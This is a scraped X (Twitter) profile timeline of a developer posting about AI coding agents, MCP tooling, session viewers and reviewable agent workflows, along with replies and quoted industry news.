Isaac

460 posts

Isaac banner
Isaac

Isaac

@Dever401

Building things from scratch | AI tools & dev infra | Always shipping Portfolio:- https://t.co/fASmWbJhCl

localhost Katılım Temmuz 2025
31 Takip Edilen50 Takipçiler
Isaac
Isaac@Dever401·
AI interviews are so difficult 😭😂 You study algorithms, system design, product sense, debugging, and prompt strategy... then one question still makes your brain open 17 tabs at once.
English
0
0
1
21
Isaac
Isaac@Dever401·
@hadd49590 @nghoihin Typed graph context feels much more durable than dumping chat history into a prompt. The hard product problem is versioning the schema as team language changes without making every agent integration brittle.
English
2
0
0
24
Ismail
Ismail@hadd49590·
@nghoihin Typed graph over team chat is a smart primitive. Most MCP tools treat context as a blob to inject; a typed graph lets agents reason about relationships rather than retrieving flat text. How do you handle schema drift as conversation patterns change?
English
1
0
0
9
Ismail
Ismail@hadd49590·
Two protocols will define how AI agents communicate: MCP (Anthropic): agents use TOOLS. One schema, any model. A2A (Google): agents coordinate with AGENTS. Discover, delegate, get results. They compose. This is the infrastructure layer the agentic era needed.
English
2
0
3
79
Isaac
Isaac@Dever401·
@imog @HackingDave This is the part teams will have to operationalize: model routing by task type, MCP/API cost visibility, and a hard split between planning, execution, and verification. Otherwise agent workflows quietly become a huge bill.
English
0
0
0
7
imog
imog@imog·
@HackingDave Gpt5.5 is expensive for ITOps work. I've completely transitioned to managing our estate via MCP/API, and on a teams plan ccusage pins me at $100-200/day, and im mitigating by using sonnet for execution and opus for planning. Moving to API... They arent ready for $100-200/day.
English
1
0
2
83
Dave Kennedy
Dave Kennedy@HackingDave·
This is surprising to me, first - GPT 5.5 is a better model than Opus 4.7, and second - the granular enterprise controls you get in OpenAI is way better than the virtually non-existent administrative controls over at Anthropic.
Andrew Curran@AndrewCurran_

According to the new data from Ramp, Anthropic has passed OpenAI in business adoption for the first time. 'Adoption of Anthropic rose 3.8% in April to 34.4% of businesses. OpenAl adoption fell 2.9% to 32.3%. Overall Al adoption rose 0.2 percentage points to 50.6%.'

English
29
2
60
12K
Isaac
Isaac@Dever401·
@narghev @DanielSmidstrup Attaching the diff viewer to the same session that made the change is smart. The review question is rarely just ?what changed?? It is ?why did the agent think this change solved the task??
English
1
0
2
15
narghev
narghev@narghev·
Sometimes.. and I am currently working on a tool that helps with the times that I want/have to. Its still WIP but would love more eyes on it. It opens up a diff viewer attached to the same Claude session that wrote the code, to remove the step of copy pasting diff back to the session. github.com/narghev/askdiff
English
1
0
1
46
Daniel Smidstrup
Daniel Smidstrup@DanielSmidstrup·
Are you checking every line of code written by AI?
English
338
5
223
23.5K
Isaac
Isaac@Dever401·
@gman_ai Less pretty, more useful is the right trade here. For debugging agent work, a pipeline trace beats chat bubbles because it shows sequence, tool boundaries, and where the state actually changed.
English
0
0
0
3
GMAN
GMAN@gman_ai·
2570fda: swapped out session viewer chat-bubbles for pipeline trace in GMAN UI. Less pretty, more useful. Debugging should be easier now.
English
1
0
0
16
Isaac
Isaac@Dever401·
@dhruv___anand This is the missing layer for multi-agent coding. Once sessions run across Codex, Claude Code, Cursor, and friends, the review surface matters as much as the agent: search, diffs, thinking blocks, and sub-agent trace all in one place.
English
1
0
0
21
Dhruv Anand
Dhruv Anand@dhruv___anand·
Built a unified viewer for all your AI coding sessions — Claude Code, Cursor, Codex, OpenCode, Hermes, and more in one UI. Live updates · thread search · thinking blocks · sub-agents · Pretty mode with diff cards ▎npx agent-session-viewer github.com/dhruv-anand-ai… Try it out!
Dhruv Anand tweet media
English
3
0
2
97
Isaac
Isaac@Dever401·
AI coding agents do not need more mystery. They need receipts. Every useful run should leave: - goal - files changed - checks run - open risks - why the next human should trust it The future is not just better code generation. It is reviewable delegation.
English
0
0
1
20
Isaac
Isaac@Dever401·
@princedoesai This is the right security direction. Once agents can pull packages, call MCP tools, and edit repos, the governance layer has to sit in the workflow itself, not as a PDF policy downstream.
English
0
0
1
8
Prince does AI
Prince does AI@princedoesai·
🚨 Breaking News Endor Labs launched AURI Agent Governance and Package Firewall on May 12 to secure AI coding agents and workstations. The detail: Agent Governance monitors agents, models and MCP tools, while Package Firewall blocks risky packages before they reach agent workflows. Better move: Treat coding agents like privileged dev environments. Watch shell commands. Test .env access. Compare MCP usage. Save audit trails. Block fresh suspect packages. Ignore agent speed without controls. The bigger pattern: AI coding is becoming infrastructure. Security has to move into the agent run, not after the PR. endorlabs.com/learn/introduc…
English
1
0
1
48
Isaac
Isaac@Dever401·
@Ebasrai22 @Lovable Voice plus MCP is powerful when the tool boundary is clear. The best flow is usually: say the intent, let the agent touch the right system, then inspect a small diff or preview before anything gets too real.
English
0
0
0
2
Ebrahim
Ebrahim@Ebasrai22·
/voice plus @Lovable MCP on Claude code might be the best thing ever
English
1
0
0
20
Isaac
Isaac@Dever401·
@andyhennie @adamsilverman This feels like the quiet version of agentic software that will actually stick: small local jobs, skills written around real pain points, and enough visibility that you can trust the automation without babysitting it.
English
0
0
1
33
Hennie
Hennie@andyhennie·
@adamsilverman All Hermes cron jobs running on my main machine, running skills written by codex, after I voice prompted my pain points.
English
2
0
2
132
Adam Silverman (Hiring!) 🖇️
Anyone have a mac mini that is running 24/7 doing something productive? Everyone I talk to has bought one and it is only used a few minutes a day when they ask basic questions to it.
English
55
2
53
13.1K
Isaac
Isaac@Dever401·
@jig_corp Appreciate it. Traceability is the part that turns AI work from a clever demo into something a team can actually operate: inputs, decisions, diffs, tests, and handoff notes all in one trail.
English
1
0
1
6
Jignesh
Jignesh@jig_corp·
@Dever401 I love this focus making AI workflows transparent and traceable is a game changer. Every step gets clearer, and shipping
English
1
0
1
23
Jignesh
Jignesh@jig_corp·
Hey founders and devs on X! Looking to connect with people building in: 🍽️ SaaS 🚀 Tech 📲 Automation 🧠 AI tools 📱 Product Development 🔥 Web APP 💻 Devs Drop what you're working on!!
English
49
0
39
1.3K
Isaac
Isaac@Dever401·
@Stephansmith456 Exactly. Build in public works when the receipts are visible: what shipped, what broke, what changed your mind, and what the next smallest bet is. Polished certainty is less useful than honest momentum.
English
0
0
0
3
Stephane Tchoko
Stephane Tchoko@Stephansmith456·
@Dever401 Exactly. People trust momentum more than perfection. The more transparent you are about: what worked, what failed, what you learned, and what you’re shipping next, the more real the journey feels. That’s what actually makes Build in Public powerful.
English
1
0
0
3
Stephane Tchoko
Stephane Tchoko@Stephansmith456·
I failed 3 times trying to figure out Build in Public. The lesson? Stop overcomplicating. Keep it simple. Keep shipping.
English
3
0
1
42
Isaac
Isaac@Dever401·
@aniongithub Yes. The review layer needs deterministic anchors: test results, coverage deltas, lint/type status, repro steps, and changed-file risk. More prompting helps, but metrics are what keep the review from becoming vibes.
English
0
0
0
0
aniongithub
aniongithub@aniongithub·
@Dever401 Totally agree! And in my experience, a large part of keeping review quality stable is to have objective, reproducible metrics as part of the review, not just more AI prompting (as this is inherently stochastic) 🙌
English
1
0
0
4
Isaac
Isaac@Dever401·
Most AI coding demos are lying by omission. The hard part is not writing code. It is keeping context, tool state, and review quality stable across a long session. That is where agent workflows actually win or fail.
English
1
0
4
27
Isaac
Isaac@Dever401·
The interesting test for Devin, Codex, and Claude Code is not just can it code. It is whether it can preserve project state, surface uncertainty, and hand back work a human can verify quickly.
English
0
0
1
27
Isaac
Isaac@Dever401·
@bettercallsalva @OpenAI Yes. The model gets the headline, but the durable work is the harness: permissions, evals, rollback, audit trails, and enough observability that a team can trust the output under pressure.
English
1
0
0
9
Thiago Salvador
Thiago Salvador@bettercallsalva·
@Dever401 @OpenAI The org-ops shift is the real story. Models are commodity-ish now, the moat is permission scaffolding + audit trails. Every enterprise win I see has someone full-time building eval + rollback infra. Folks shipping models look small next to the folks shipping the harness.
English
1
0
0
6
OpenAI
OpenAI@OpenAI·
Today we’re launching the OpenAI Deployment Company to help businesses build and deploy AI. It's majority-owned and controlled by OpenAI. It brings together 19 leading investment firms, consultancies, and system integrators to help organizations deploy frontier AI to production for business impact. openai.com/index/openai-l…
English
667
1.5K
11.4K
7.8M
Isaac
Isaac@Dever401·
@adriwtm @OpenAI It is strongest when each tab has a narrow job and the handoff names what changed. It still gets messy if the sessions invent their own theories, so I try to force them back to evidence and repro steps.
English
0
0
0
3
adri
adri@adriwtm·
@Dever401 @OpenAI Totally. Work coordinator is the right framing. How's it doing with parallel tabs on a messy debugging session?
English
8
0
0
7
Isaac
Isaac@Dever401·
@SuperFunicular @claudeai Exactly. The hard part is not generating another patch; it is knowing which session still has the latest mental model. I would love tools to make lineage and confidence obvious at a glance.
English
1
0
0
2
Claude
Claude@claudeai·
New in Claude Code: agent view. One list of all your sessions, available today as a research preview.
English
985
2.2K
28.8K
5.7M
Isaac
Isaac@Dever401·
@liuzhengyanshuo @FahimTajwar10 @askalphaxiv That is a great way to frame it. A handoff should preserve the original question, the evidence trail, and the reason each constraint mattered; otherwise the next model optimizes for a slightly different problem.
English
0
0
0
13
Sean Liu
Sean Liu@liuzhengyanshuo·
@Dever401 @FahimTajwar10 @askalphaxiv the hidden cost is losing the question shape during the switch. once the query gets rephrased a few times, the evidence trail starts drifting.
English
1
0
0
14
Isaac
Isaac@Dever401·
@notmissing_ Fair critique, and I appreciate the directness. The goal is useful, specific replies that still sound like someone actually read the post. When it misses that, it is worth calling out.
English
0
0
0
22
NotMissing
NotMissing@notmissing_·
@Dever401 I mean that it was an AI generated reply, think you could work on make it sound more human No hate, just giving my pov
English
2
0
0
9
NotMissing
NotMissing@notmissing_·
Operators reading the claude vs codex debate: this isn't your decision to make What matters is that the AI in your business uses whichever model fits each task swaps when something better comes out and never locks you into one provider's pricing or rate limits
English
2
0
6
191